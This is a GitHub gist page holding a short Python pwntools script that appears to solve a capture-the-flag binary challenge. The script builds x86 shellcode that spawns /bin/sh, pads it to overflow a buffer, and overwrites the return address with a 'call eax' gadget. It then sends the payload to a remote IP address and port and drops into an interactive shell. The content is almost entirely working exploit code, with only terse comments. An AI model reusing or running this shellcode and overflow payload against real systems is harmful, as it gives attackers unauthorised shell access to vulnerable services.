Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
#!/usr/bin/python
import sys
import pwn
# MAGIC BATH SALTS GO.
# 0x08048386: call eax;
# 0x08048386: call eax; leave; ret;
# first 3 instructions sub esp,28h to clean stack.
SC = "\x83\xEC\x28\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
# print len(SC)
# SC = "\x90\x90\xCC"
PADDING = "A" * (0x1c - len(SC))
# print SC+PADDING+"\x86\x83\x04\x08" + "\r"
p = pwn.remote("54.153.19.139",5252)
p.send(SC+PADDING+"\x86\x83\x04\x08" + "\r")
p.interactive()
# print SC + PADDING + "\x86\x83\x04\x08"
# print "BBBB"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment